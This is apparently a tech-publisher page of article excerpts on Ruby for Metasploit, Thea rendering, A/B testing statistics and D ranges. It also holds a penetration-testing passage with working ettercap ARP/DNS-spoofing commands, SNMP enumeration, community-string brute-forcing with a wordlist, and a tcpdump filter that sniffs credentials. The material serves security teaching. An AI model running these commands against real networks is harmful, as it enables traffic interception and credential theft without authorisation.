have a look at an example: irb(main):001:0> def week2day(week) irb(main):002:1> week=week*7 irb(main):003:1> puts(week) irb(main):004:1> end => nil We defined a method named week2day that receives an argument named week. Further more, we multiplied the received argument with 7 and printed out the result using the puts function. Let's call this function with an argument with 4 as the value: irb(main):005:0> week2day(4) 28 => nil We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print the output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used. Variables and data types in Ruby A variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous variables' data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are. Working with strings Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease as seen in the previous example. By simply defining the value in quotation marks or a single quotation mark, we can assign a value to a string. It is recommended to use double quotation marks because if single quotations are used, it can create problems. Let's have a look at the problem that may arise: irb(main):005:0> name = 'Msf Book' => "Msf Book" irb(main):006:0> name = 'Msf's Book' irb(main):007:0' ' We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because it read the single quotation mark in the Msf's string as the end of single quotations, which is not the case; this situation caused a syntax-based error. The split function We can split the value of a string into a number of consecutive variables using the split function. Let's have a look at a quick example that demonstrates this: irb(main):011:0> name = "nipun jaswal" => "nipun jaswal" irb(main):012:0> name,surname=name.split(' ') => ["nipun", "jaswal"] irb(main):013:0> name => "nipun" irb(main):014:0> surname => "jaswal" Here, we have split the value of the entire string into two consecutive strings, name and surname by using the split function. However, this function split the entire string into two strings by considering the space to be the split's position. The squeeze function The squeeze function removes extra spaces from the given string, as shown in the following code snippet: irb(main):016:0> name = "Nipun Jaswal" => "Nipun Jaswal" irb(main):017:0> name.squeeze => "Nipun Jaswal" Numbers and conversions in Ruby We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Simultaneously, we can convert an integer number into a string using the .to_s function. Let's have a look at some quick examples and their output: irb(main):006:0> b="55" => "55" irb(main):007:0> b+10 TypeError: no implicit conversion of Fixnum into String from (irb):7:in `+' from (irb):7 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):008:0> b.to_i+10 => 65 irb(main):009:0> a=10 => 10 irb(main):010:0> b="hello" => "hello" irb(main):011:0> a+b TypeError: String can't be coerced into Fixnum from (irb):11:in `+' from (irb):11 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):012:0> a.to_s+b => "10hello" We can see that when we assigned a value to b in quotation marks, it was considered as a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer variable, and addition was performed successfully. Similarly, with regards to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked. Ranges in Ruby Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type: irb(main):028:0> zero_to_nine= 0..9 => 0..9 irb(main):031:0> zero_to_nine.include?(4) => true irb(main):032:0> zero_to_nine.include?(11) => false irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)} 0123456789=> 0..9 irb(main):003:0> zero_to_nine.min => 0 irb(main):004:0> zero_to_nine.max => 9 We can see that a range offers various operations such as searching, finding the minimum and maximum values, and displaying all the data in a range. Here, the include? function checks whether the value is contained in the range or not. In addition, the min and max functions display the lowest and highest values in a range. Arrays in Ruby We can simply define arrays as a list of various values. Let's have a look at an example: irb(main):005:0> name = ["nipun","james"] => ["nipun", "james"] irb(main):006:0> name[0] => "nipun" irb(main):007:0> name[1] => "james" So, up to this point, we have covered all the required variables and data types that we will need for writing Metasploit modules. For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/ Refer to a quick cheat sheet for using Ruby programming effectively at the following links: https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf http://hyperpolyglot.org/scripting Methods in Ruby A method is another name for a function. Programmers with a different background than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy, and their definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand their working, for example, printing out the square of 50: def print_data(par1) square = par1*par1 return square end answer=print_data(50) print(answer) The print_data method receives the parameter sent from the main function, multiplies it with itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value. Decision-making operators Decision making is also a simple concept as with any other programming language. Let's have a look at an example: irb(main):001:0> 1 > 2 => false irb(main):002:0> 1 < 2 => true Let's also consider the case of string data: irb(main):005:0> "Nipun" == "nipun" => false irb(main):006:0> "Nipun" == "Nipun" => true Let's consider a simple program with decision-making operators: #Main num = gets num1 = num.to_i decision(num1) #Function def decision(par1) print(par1) par1= par1 if(par1%2==0) print("Number is Even") else print("Number is Odd") end end We ask the user to enter a number and store it in a variable named num using gets. However, gets will save the user input in the form of a string. So, let's first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, it is concluded that the number is divisible by true, which is why the if block is executed; if the condition is not met, the else block is executed. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
Read more
  • 0
  • 0
  • 13005

article-image-setting-photoreal-rendering
Packt
23 May 2014
6 min read
Save for later

Setting Up for Photoreal Rendering

Packt
23 May 2014
6 min read
(For more resources related to this topic, see here.) Rendering process The following are the steps of the SketchUp and Thea rendering process. This process will work for other renderers, too, and is a good way of structuring your workflow, because you achieve great results in little time. For example, why find out a material hasn't mapped at the right scale only after an hour-long render? With the following process, you will find that out in a few minutes with a quick test render. Step 1: Preparing the SketchUp model Step 2: Performing an initial test render Step 3: Assigning materials Step 4: Defining lighting Step 5: Inserting extra entourage Step 6: Production rendering Step 7: Postproduction rendering We are going to look at each of these steps in detail using a small test room and an atrium scene. The test room is a variation of the famous Cornell Box, a well-established test setup to evaluate rendering algorithms. You can also use any scene that you have set up yourself in SketchUp. Thea for SketchUp interface The main interface for working with Thea in SketchUp is the Thea for SketchUp plugin. The plugin gives you access to all features that are necessary to set up and render a scene out of SketchUp. This is beneficial for a quick workflow, because you don't have to switch between SketchUp and the Thea Studio application during the setup of your scene. The Thea plugin is accessible by navigating to Plugins | Thea Render. It is split into two main windows: the Thea Tool window and the Thea Rendering Window. There is also a toolbar with two buttons to enable each of these windows. The Thea Tool window We will use the buttons and controls of the tool window to set up the camera options and add materials and other elements that will be specially treated during the export (such as lights). The window is structured in four panels (or tabs) that you can see in the following image: When the Thea Tool is active, you will also see a red frame displayed in the SketchUp 3D window that shows the field of view for the current Thea camera. This either frames the area that will be rendered or indicates that the camera view is wider than the SketchUp window via arrows to the left and right. You will also notice that the SketchUp cursor changes when you have the Thea Tool window open. Depending on the current tool in use, there are a number of different cursor shapes. The default is a small cross and is used to select SketchUp materials for the material assignment. The Thea Rendering Window The main window is the place where you can set up, control, and view the rendering process itself. The window has a large area at the top where the rendered image is displayed. Below is a row of buttons to save and refresh rendered images and to start, pause, and stop the current render. You can see a screenshot of the rendering window with an open scene in the following image: At the bottom of the window, you will find the control elements for the rendering and display of images and the advanced scene options. Step 1 – Preparing the SketchUp model To follow the steps in this article, you can download the Cornell Box SketchUp file from Packt Support. In this demo scene, the model is already prepared for 3D rendering, and there are scenes set up to follow the steps below. If you imported our test box from the 3D Warehouse (search for Cornell Box) or used your own SketchUp model, you should do some preparations before you can start rendering: Create a copy of your SketchUp file just for rendering. You will create new scenes and content dedicated to the rendering process, and you can save all this in a dedicated SketchUp file. Remove unused content. Check the model for hidden geometry, unused and obsolete scene tabs and layers, and especially materials. Purge the material list. Identify the important materials in the scene, especially those that are used for windows and nearby large objects. Double-check the orientation of surfaces that you want to convert to emitting surfaces or to which you want to apply a displacement map. Create and save important camera viewpoints in scene tabs. Step 2 – Performing an initial test render You are now going to do a test render to see how the model looks like when rendered in another renderer. You can use this first test to identify areas that need more modeling or parts where you should add textures to make them more interesting. In SketchUp, select the view you want to render. If you use the Cornell scene from the Packt Publishing website, select the Step 2 scene. If you imported the Cornell box from the 3D Warehouse, select one side of the box and hide it so that you can see the objects inside. Open the Thea Tool window by navigating to Plugins | Thea Render | Thea Tool. Check that the resolution on the camera tab is set to 800 x 600 pixels, and the aspect ratio is set to 4:3. These are the defaults. Open the Thea render window by navigating to Plugins | Thea Render | Thea Rendering Window. In the settings area of the Thea window, select Adaptive (BSD) as the render mode. Then, check that the Preset selection is set to 00. Exterior Preview. Click on the Start button. Your scene will render, and you should see the progress in the image area of the window. The rendering should complete in less than a minute (depending on your computer performance, of course). The final image will look something like the following image: Review the rendered image, and pay attention to the following aspects: Check that all the textures are in place correctly. Make a note of where the textures are missing or distorted. (Note that there are no textures in our scene yet.) Look out for the quality of the geometry details, especially on rounded corners and smooth surfaces such as the teapot and sphere in our scene. Search for areas in the image that look unnaturally "empty". You should consider adding further geometry or a surface texture to make these areas more visually interesting. Also, look at the distribution of the objects in your scene. Remember that this is a 2D representation of your room that should look well balanced without the knowledge of the 3D model behind it. If you have found any issues with your scene, you should now go back into SketchUp and make some corrections. This is the export-check loop, which you may have to repeat a few times. The more you get used to SketchUp and your rendering application, the less you will need to do this. However, for now, there is a lot to learn by performing this exercise, so the time is well spent. Summary In this article, we got a glimpse of the ways in which we can use tools such as Thea for performing photorealstic rendering on our scenes. Resources for Article: Further resources on this subject: Walkthrough Tools within SketchUp 7.1 [Article] Diving Straight into Photographic Rendering [Article] Case study – modifying a GoPro wrench [Article]
Read more
  • 0
  • 0
  • 3146

article-image-network-exploitation-and-monitoring
Packt
22 May 2014
8 min read
Save for later

Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
(For more resources related to this topic, see here.) Man-in-the-middle attacks Using ARP abuse, we can actually perform more elaborate man-in-the-middle (MITM)-style attacks building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that. MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit, being communicated between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today! Ettercap DNS spoofing Ettercap is a tool that facilitates a simple command line and graphical interface to perform MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps: Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS name and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification: ettercap [OPTIONS] [TARGET1] [TARGET2] To perform a MITM attack using ettercap, you need to supply the –M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like: ettercap –M arp:remote –P dns_spoof [TARGET1] [TARGET2] Where TARGET1 and TARGET2 is the host you want to intercept and either the default gateway or DNS server, interchangeably. To target the host at address 192.168.10.106 with a default gateway of 192.168.10.1, you will invoke the following command: ettercap –M arp:remote –P dns_spoof /192.168.10.107//192.168.10.1/ Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listen for any DNS requests to the domains it's configured to resolve. Interrogating servers For any network device to participate in communication, certain information needs to be accessible to it, no device will be able to look up a domain name or find an IP address without the participation of devices in charge of certain information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it. SNMP interrogation The Simple Network Management Protocol (SNMP) is used by routers and other network components in order to support remote monitoring of things such as bandwidth, CPU/Memory usage, hard disk space usage, logged on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to proliferate any potentially useful information from it. About SNMP Security SNMP services before Version 3 are not designed with security in mind. Authentication to these services often comes in the form a simple string of characters called a community string. Another common implementation flaw that is inherent to SNMP Version 1 and 2 is the ability to brute-force and eavesdrop on communication. To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by using the following command: snmpwalk –v [1 | 2c | 3 ] –c [community string] [target host] For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service: snmpwalk –v 1 –c public 192.168.10.103 Here, we opted to use SNMP Version 1, hence the –v 1 in the invocation for the preceding command. The output will look something like the following screenshot: As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database. Exploiting SNMP successfully is often strongly depended on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to its host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it. Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script pretty much does exactly what snmpwalk does except it structures the extracted information in a friendlier format. This makes it easier to understand. Here's an example: msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE] The options available for this module are shown in the following screenshot: Here's an example invocation against the host in our running example: msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103 The preceding command produces the following output: You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter. In other situations, you may not always be lucky enough to preemptively know the community string being used. However, luckily SNMP Version 1, 2, 2c, and 3c do not inherently have any protection against brute-force attacks, nor do any of them use any form of network based encryption. In the case of SNMP Version 1 and 2c, you could use a nifty Metasploit module called snmp-login that will run through a list of possible community strings and determine the level of access the enumerated strings gives you. You can use it by running the following command: msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103 The preceding command produces the following output: As seen in the preceding screenshot, once the run is complete it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module on some of the password lists that ship with Kali Linux, as follows: msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/ rockyou.txt RHOSTS=192.168.10.103 This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script as shown in the following example: #!/bin/bash if [ $# != 1 ] then echo "USAGE: . snmp [HOST]" exit 1 fi TARGET=$1 echo "[*] Running SNMP enumeration on '$TARGET'" for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F' '/access with community/ { print $2 }'`; do echo "[*] found community string '$comm_string' ...running enumeration"; msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null; done The following command shows you how to use it: . snmp.sh [TAGRET] In our running example, it is used as follows: . snmp.sh 192.168.10.103 Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example: tcpdump udp port 161 –i eth0 –vvv –A The preceding command will produce the following output: Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to see the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux versions.
Read more
  • 0
  • 0
  • 5849
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
Packt
22 May 2014
13 min read
Save for later

A/B Testing – Statistical Experiments for the Web

Packt
22 May 2014
13 min read
(For more resources related to this topic, see here.) Defining A/B testing At its most fundamental level, A/B testing just involves creating two different versions of a web page. Sometimes, the changes are major redesigns of the site or the user experience, but usually, the changes are as simple as changing the text on a button. Then, for a short period of time, new visitors are randomly shown one of the two versions of the page. The site tracks their behavior, and the experiment determines whether one version or the other increases the users' interaction with the site. This may mean more click-through, more purchases, or any other measurable behavior. This is similar to other methods in other domains that use different names. The basic framework randomly tests two or more groups simultaneously and is sometimes called random-controlled experiments or online-controlled experiments. It's also sometimes referred to as split testing, as the participants are split into two groups. These are all examples of between-subjects experiment design. Experiments that use these designs all split the participants into two groups. One group, the control group, gets the original environment. The other group, the test group, gets the modified environment that those conducting the experiment are interested in testing. Experiments of this sort can be single-blind or double-blind. In single-blind experiments, the subjects don't know which group they belong to. In double-blind experiments, those conducting the experiments also don't know which group the subjects they're interacting with belong to. This safeguards the experiments against biases that can be introduced by participants being aware of which group they belong to. For example, participants could get more engaged if they believe they're in the test group because this is newer in some way. Or, an experimenter could treat a subject differently in a subtle way because of the group that they belong to. As the computer is the one that directly conducts the experiment, and because those visiting your website aren't aware of which group they belong to, website A/B testing is generally an example of double-blind experiments. Of course, this is an argument for only conducting the test on new visitors. Otherwise, the user might recognize that the design has changed and throw the experiment away. For example, the users may be more likely to click on a new button when they recognize that the button is, in fact, new. However, if they are new to the site as a whole, then the button itself may not stand out enough to warrant extra attention. In some cases, these subjects can test more variant sites. This divides the test subjects into more groups. There needs to be more subjects available in order to compensate for this. Otherwise, the experiment's statistical validity might be in jeopardy. If each group doesn't have enough subjects, and therefore observations, then there is a larger error rate for the test, and results will need to be more extreme to be significant. In general, though, you'll want to have as many subjects as you reasonably can. Of course, this is always a trade-off. Getting 500 or 1000 subjects may take a while, given the typical traffic of many websites, but you still need to take action within a reasonable amount of time and put the results of the experiment into effect. So we'll talk later about how to determine the number of subjects that you actually need to get a certain level of significance. Another wrinkle that is you'll want to know as soon as possible is whether one option is clearly better or not so that you can begin to profit from it early. In the multi-armed bandit problem, this is a problem of exploration versus exploitation. This refers to the tension in the experiment design (and other domain) between exploring the problem space and exploiting the resources you've found in the experiment so far. We won't get into this further, but it is a factor to stay aware of as you perform A/B tests in the future. Because of the power and simplicity of A/B testing, it's being widely used in a variety of domains. For example, marketing and advertising make extensive use of it. Also, it has become a powerful way to test and improve measurable interactions between your website and those who visit it online. The primary requirement is that the interaction be somewhat limited and very measurable. Interesting would not make a good metric; the click-through rate or pages visited, however, would. Because of this, A/B tests validate changes in the placement or in the text of buttons that call for action from the users. For example, a test might compare the performance of Click for more! against Learn more now!. Another test may check whether a button placed in the upper-right section increases sales versus one in the center of the page. These changes are all incremental, and you probably don't want to break a large site redesign into pieces and test all of them individually. In a larger redesign, several changes may work together and reinforce each other. Testing them incrementally and only applying the ones that increase some metric can result in a design that's not aesthetically pleasing, is difficult to maintain, and costs you users in the long run. In these cases, A/B testing is not recommended. Some other things that are regularly tested in A/B tests include the following parts of a web page: The wording, size, and placement of a call-to-action button The headline and product description The length, layout, and fields in a form The overall layout and style of the website as a larger test, which is not broken down The pricing and promotional offers of products The images on the landing page The amount of text on a page Now that we have an understanding of what A/B testing is and what it can do for us, let's see what it will take to set up and perform an A/B test. Conducting an A/B test In creating an A/B test, we need to decide several things, and then we need to put our plan into action. We'll walk through those decisions here and create a simple set of web pages that will test the aspects of design that we are interested in changing, based upon the behavior of the user. Before we start building stuff, though, we need to think through our experiment and what we'll need to build. Planning the experiment For this article, we're going to pretend that we have a website for selling widgets (or rather, looking at the website Widgets!). The web page in this screenshot is the control page. Currently, we're getting 24 percent click-through on it from the Learn more! button. We're interested in the text of the button. If it read Order now! instead of Learn more!, it might generate more click-through. (Of course, actually explaining what the product is and what problems it solves might be more effective, but one can't have everything.) This will be the test page, and we're hoping that we can increase the click-through rate to 29 percent (a five percent absolute increase). Now that we have two versions of the page to experiment with, we can frame the experiment statistically and figure out how many subjects we'll need for each version of the page in order to achieve a statistically meaningful increase in the click-through rate on that button. Framing the statistics First, we need to frame our experiment in terms of the null-hypothesis test. In this case, the null hypothesis would look something like this: Changing the button copy from Learn more! to Order now! Would not improve the click-through rate. Remember, this is the statement that we're hoping to disprove (or fail to disprove) in the course of this experiment. Now we need to think about the sample size. This needs to be fixed in advance. To find the sample size, we'll use the standard error formula, which will be solved to get the number of observations to make for about a 95 percent confidence interval in order to get us in the ballpark of how large our sample should be: In this, δ is the minimum effect to detect and σ² is the sample variance. If we are testing for something like a percent increase in the click-through, the variance is σ² = p(1 – p), where p is the initial click-through rate with the control page. So for this experiment, the variance will be 0.24(1-0.24) or 0.1824. This would make the sample size for each variable 16(0.1824 / 0.052) or almost 1170. The code to compute this in Clojure is fairly simple: (defn get-target-sample [rate min-effect] (let [v (* rate (- 1.0 rate))] (* 16.0 (/ v (* min-effect min-effect))))) Running the code from the prompt gives us the response that we expect: user=> (get-target-sample 0.24 0.05) 1167.36 Part of the reason to calculate the number of participants needed is that monitoring the progress of the experiment and stopping it prematurely can invalidate the results of the test because it increases the risk of false positives where the experiment says it has disproved the null hypothesis when it really hasn't. This seems counterintuitive, doesn't it? Once we have significant results, we should be able to stop the test. Let's work through it. Let's say that in actuality, there's no difference between the control page and the test page. That is, both sets of copy for the button get approximately the same click-through rate. If we're attempting to get p ≤ 0.05, then it means that the test will return a false positive five percent of the time. It will incorrectly say that there is a significant difference between the click-through rates of the two buttons five percent of the time. Let's say that we're running the test and planning to get 3,000 subjects. We end up checking the results of every 1,000 participants. Let's break down what might happen: Run A B C D E F G H 1000 No No No No Yes Yes Yes Yes 2000 No No Yes Yes No Yes No Yes 3000 No Yes No Yes No No Yes Yes Final No Yes No Yes No No Yes Yes Stopped No Yes Yes Yes Yes Yes Yes Yes Let's read this table. Each lettered column represents a scenario for how the significance of the results may change over the run of the test. The rows represent the number of observations that have been made. The row labeled Final represents the experiment's true finishing result, and the row labeled Stopped represents the result if the experiment is stopped as soon as a significant result is seen. The final results show us that out of eight different scenarios, the final result would be significant in four cases (B, D, G, and H). However, if the experiment is stopped prematurely, then it will be significant in seven cases (all but A). The test could drastically over-generate false positives. In fact, most statistical tests assume that the sample size is fixed before the test is run. It's exciting to get good results, so we'll design our system so that we can't easily stop it prematurely. We'll just take that temptation away. With this in mind, let's consider how we can implement this test. Building the experiment There are several options to actually implement the A/B test. We'll consider several of them and weigh their pros and cons. Ultimately, the option that works best for you really depends on your circumstances. However, we'll pick one for this article and use it to implement the test for it. Looking at options to build the site The first way to implement A/B testing is to use a server-side implementation. In this case, all of the processing and tracking is handled on the server, and visitors' actions would be tracked using GET or POST parameters on the URL for the resource that the experiment is attempting to drive traffic towards. The steps for this process would go something like the following ones: A new user visits the site and requests for the page that contains the button or copy that is being tested. The server recognizes that this is a new user and assigns the user a tracking number. It assigns the user to one of the test groups. It adds a row in a database that contains the tracking number and the test group that the user is part of. It returns the page to the user with the copy, image, or design that is reflective of the control or test group. The user views the returned page and decides whether to click on the button or link or not. If the server receives a request for the button's or link's target, it updates the user's row in the tracking table to show us that the interaction was a success, that is, that the user did a click-through or made a purchase. This way of handling it keeps everything on the server, so it allows more control and configuration over exactly how you want to conduct your experiment. A second way of implementing this would be to do everything using JavaScript (or ClojureScript, https://github.com/clojure/clojurescript). In this scenario, the code on the page itself would randomly decide whether the user belonged to the control or the test group, and it would notify the server that a new observation in the experiment was beginning. It would then update the page with the appropriate copy or image. Most of the rest of this interaction is the same as the one in previous scenario. However, the complete steps are as follows: A new user visits the site and requests for the page that contains the button or copy being tested. The server inserts some JavaScript to handle the A/B test into the page. As the page is being rendered, the JavaScript library generates a new tracking number for the user. It assigns the user to one of the test groups. It renders that page for the group that the user belongs to, which is either the control group or the test group. It notifies the server of the user's tracking number and the group. The server takes this notification and adds a row for the observation in the database. The JavaScript in the browser tracks the user's next move either by directly notifying the server using an AJAX call or indirectly using a GET parameter in the URL for the next page. The server receives the notification whichever way it's sent and updates the row in the database. The downside of this is that having JavaScript take care of rendering the experiment might take slightly longer and may throw off the experiment. It's also slightly more complicated, because there are more parts that have to communicate. However, the benefit is that you can create a JavaScript library, easily throw a small script tag into the page, and immediately have a new A/B experiment running. In reality, though, you'll probably just use a service that handles this and more for you. However, it still makes sense to understand what they're providing for you, and that's what this article tries to do by helping you understand how to perform an A/B test so that you can be make better use of these A/B testing vendors and services.
Read more
  • 0
  • 0
  • 2308

article-image-ranges
Packt
22 May 2014
11 min read
Save for later

Ranges

Packt
22 May 2014
11 min read
(For more resources related to this topic, see here.) Sorting ranges efficiently Phobos' std.algorthm includes sorting algorithms. Let's look at how they are used, what requirements they have, and the dangers of trying to implement range primitives without minding their efficiency requirements. Getting ready Let's make a linked list container that exposes an appropriate view, a forward range, and an inappropriate view, a random access range that doesn't meet its efficiency requirements. A singly-linked list can only efficiently implement forward iteration due to its nature; the only tool it has is a pointer to the next element. Implementing any other range primitives will require loops, which is not recommended. Here, however, we'll implement a fully functional range, with assignable elements, length, bidirectional iteration, random access, and even slicing on top of a linked list to see the negative effects this has when we try to use it. How to do it… We're going to both sort and benchmark this program. To sort Let's sort ranges by executing the following steps: Import std.algorithm. Determine the predicate you need. The default is (a, b) => a < b, which results in an ascending order when the sorting is complete (for example, [1,2,3]). If you want ascending order, you don't have to specify a predicate at all. If you need descending order, you can pass a greater-than predicate instead, as shown in the following line of code: auto sorted = sort!((a, b) => a > b)([1,2,3]); // results: [3,2,1] When doing string comparisons, the functions std.string.cmp (case-sensitive) or std.string.icmp (case-insensitive) may be used, as is done in the following code: auto sorted = sort!((a, b) => cmp(a, b) < 0)(["b", "c", "a"]); // results: a, b, c Your predicate may also be used to sort based on a struct member, as shown in the following code: auto sorted = sort!((a, b) => a.value < b.value)(structArray); Pass the predicate as the first compile-time argument. The range you want to sort is passed as the runtime argument. If your range is not already sortable (if it doesn't provide the necessary capabilities), you can convert it to an array using the array function from std.range, as shown in the following code: auto sorted = sort(fibanocci().take(10)); // won't compile, not enough capabilities auto sorted = sort(fibanocci().take(10).array); // ok, good Use the sorted range. It has a unique type from the input to signify that it has been successfully sorted. Other algorithms may use this knowledge to increase their efficiency. To benchmark Let's sort objects using benchmark by executing the following steps: Put our range and skeleton main function from the Getting ready section of this recipe into a file. Use std.datetime.benchmark to test the sorting of an array from the appropriate walker against the slow walker and print the results at the end of main. The code is as follows: auto result = benchmark!( { auto sorted = sort(list.walker.array); }, { auto sorted = sort(list.slowWalker); } )(100); writefln("Emulation resulted in a sort that was %d times slower.", result[1].hnsecs / result[0].hnsecs); Run it. Your results may vary slightly, but you'll see that the emulated, inappropriate range functions are consistently slower. The following is the output: Emulation resulted in a sort that was 16 times slower. Tweak the size of the list by changing the initialization loop. Instead of 1000 entries, try 2000 entries. Also, try to compile the program with inlining and optimization turned on (dmd –inline –O yourfile.d) and see the difference. The emulated version will be consistently slower, and as the list becomes longer, the gap will widen. On my computer, a growing list size led to a growing slowdown factor, as shown in the following table: List size Slowdown factor 500 13 1000 16 2000 29 4000 73 How it works… The interface to Phobos' main sort function hides much of the complexity of the implementation. As long as we follow the efficiency rules when writing our ranges, things either just work or fail, telling us we must call an array in the range before we can sort it. Building an array has a cost in both time and memory, which is why it isn't performed automatically (std.algorithm prefers lazy evaluation whenever possible for best speed and minimum memory use). However, as you can see in our benchmark, building an array is much cheaper than emulating unsupported functions. The sort algorithms require a full-featured range and will modify the range you pass to it instead of allocating memory for a copy. Thus, the range you pass to it must support random access, slicing, and either assignable or swappable elements. The prime example of such a range is a mutable array. This is why it is often necessary to use the array function when passing data to sort. Our linked list code used static if with a compile-time parameter as a configuration tool. The implemented functions include opSlice and properties that return ref. The ref value can only be used on function return values or parameters. Assignments to a ref value are forwarded to the original item. The opSlice function is called when the user tries to use the slice syntax: obj[start .. end]. Inside the beSlow condition, we broke the main rule of implementing range functions: avoid loops. Here, we see the consequences of breaking that rule; it ruined algorithm restrictions and optimizations, resulting in code that performs very poorly. If we follow the rules, we at least know where a performance problem will arise and can handle it gracefully. For ranges that do not implement the fast length property, std.algorithm includes a function called walkLength that determines the length by looping through all items (like we did in the slow length property). The walkLength function has a longer name than length precisely to warn you that it is a slower function, running in O(n) (linear with length) time instead of O(1) (constant) time. Slower functions are OK, they just need to be explicit so that the user isn't surprised. See also The std.algorithm module also includes other sorting algorithms that may fit a specific use case better than the generic (automatically specialized) function. See the documentation at http://dlang.org/phobos/std_algorithm.html for more information. Searching ranges Phobos' std.algorithm module includes search functions that can work on any ranges. It automatically specializes based on type information. Searching a sorted range is faster than an unsorted range. How to do it… Searching has a number of different scenarios, each with different methods: If you want to know if something is present, use canFind. Finding an item generically can be done with the find function. It returns the remainder of the range, with the located item at the front. When searching for a substring in a string, you can use haystack.find(boyerMooreFinder(needle)). This uses the Boyer-Moore algorithm which may give better performance. If you want to know the index where the item is located, use countUntil. It returns a numeric index into the range, just like the indexOf function for strings. Each find function can take a predicate to customize the search operation. When you know your range is sorted but the type doesn't already prove it, you may call assumeSorted on it before passing it to the search functions. The assumeSorted function has no runtime cost; it only adds information to the type that is used for compile-time specialization. How it works… The search functions in Phobos make use of the ranges' available features to choose good-fit algorithms. Pass them efficiently implemented ranges with accurate capabilities to get best performance. The find function returns the remainder of the data because this is the most general behavior; it doesn't need random access, like returning an index, and doesn't require an additional function if you are implementing a function to split a range on a given condition. The find function can work with a basic input range, serving as a foundation to implement whatever you need on top of it, and it will transparently optimize to use more range features if available. Using functional tools to query data The std.algorithm module includes a variety of higher-order ranges that provide tools similar to functional tools. Here, we'll see how D code can be similar to a SQL query. A SQL query is as follows: SELECT id, name, strcat("Title: ", title) FROM users WHERE name LIKE 'A%' ORDER BY id DESC LIMIT 5; How would we express something similar in D? Getting ready Let's create a struct to mimic the data table and make an array with the some demo information. The code is as follows: struct User { int id; string name; string title; 